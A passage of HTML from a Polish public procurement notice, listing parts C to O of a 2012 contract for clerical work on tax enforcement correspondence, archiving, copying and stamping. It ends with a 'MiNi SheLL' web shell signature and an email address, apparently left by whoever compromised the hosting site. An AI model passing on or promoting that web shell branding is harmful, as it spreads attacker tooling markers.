4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część C - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część D - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część E - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część E - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część F - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część F - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część G - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część G - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część H - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część H - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część I - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część J - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)  segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część J - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)  segregowanie, opisywanie, kompletowanie i przekazywanie spraw załatwionych do archiwum - 1.500 szt.,
2)	przygotowywanie korespondencji do wysyłki - 3.000 szt.,
3)	sporządzanie kserokopii dokumentów - 2.400 szt.,
4)	stemplowanie tytułów wykonawczych - 1.800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część K: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych -3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki -100 szt.,
(...).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część K: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych -3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki -100 szt.,
7)	przygotowywanie pism do organów egzekucyjnych związanych z prowadzonym postępowaniem egzekucyjnym - 10 szt.,
8)	sporządzanie kserokopii dokumentów - 100 szt.,
9)	segregowanie, wpinanie dokumentów związanych z postępowaniem egzekucyjnym -3.500 szt.,
10)	archiwizowanie akt dotyczących postępowania egzekucyjnego - 30 szt.,
11)	wyszukiwanie dokumentów związanych z postępowaniem egzekucyjnym w archiwum - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część L: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych - 3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki - 100 szt.,
(...).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część L: Przedmiot zamówienia obejmuje w okresie trwania umowy: 
1)	przygotowywanie korespondencji do wysyłki - 4.000 szt.,
2)	rejestracja (migracja) upomnień do Biblioteki Akt - 3.000 szt.,
3)	odnotowywanie daty odbioru upomnienia w POLTAX 2B - 3.750 szt.,
4)	stemplowanie upomnień, kopert, potwierdzeń odbioru - 3.750 szt.,
5)	stemplowanie tytułów wykonawczych - 3.500 szt.,
6)	przygotowywanie tytułów wykonawczych do wysyłki - 100 szt.,
7)	przygotowywanie pism do organów egzekucyjnych związanych z prowadzonym postępowaniem egzekucyjnym - 10 szt.,
8)	sporządzanie kserokopii dokumentów - 100 szt.,
9)	segregowanie, wpinanie dokumentów związanych z postępowaniem egzekucyjnym -3.500 szt.,
10)	archiwizowanie akt dotyczących postępowania egzekucyjnego - 30 szt.,
11)	wyszukiwanie dokumentów związanych z postępowaniem egzekucyjnym w archiwum - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część M - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1)	przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych - 11.907 szt.,
(...).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część M - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1)	przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych - 11.907 szt.,
5)	wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 1.250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Część N - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1) przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych -11.907 szt.,
(...).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część N - Przedmiot zamówienia obejmuje w okresie trwania umowy, wykonywanie czynności kancelaryjnych, tj.:
1) przyjmowanie od pracowników Zamawiającego korespondencji dot. egzekucji administracyjnej - 19.110 szt.,
2)	przyjmowanie korespondencji zewnętrznej (np. od komorników) dot. egzekucji administracyjnej - 4.600 szt.,
3)	segregowanie korespondencji zewnętrznej, o której mowa w ppkt 2 - 4.600 szt.,
4)	ręczne wpisywanie korespondencji do książek nadawczych -11.907 szt.,
5)	wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 1.250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Część O - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	obsługę urządzeń kopiujących, sporządzanie kserokopii dokumentów - 6.000 szt.,
2)	ręczne wpisywanie korespondencji do książek nadawczych - 11.906 szt.,
3)  wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 500 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część O - Przedmiot zamówienia obejmuje w okresie trwania umowy:
1)	obsługę urządzeń kopiujących, sporządzanie kserokopii dokumentów - 6.000 szt.,
2)	ręczne wpisywanie korespondencji do książek nadawczych - 11.906 szt.,
3)  wpisywanie korespondencji do książek nadawczych w systemie informatycznym Biblioteka Akt - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.57.00.00-0, 79.52.10.00-2, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com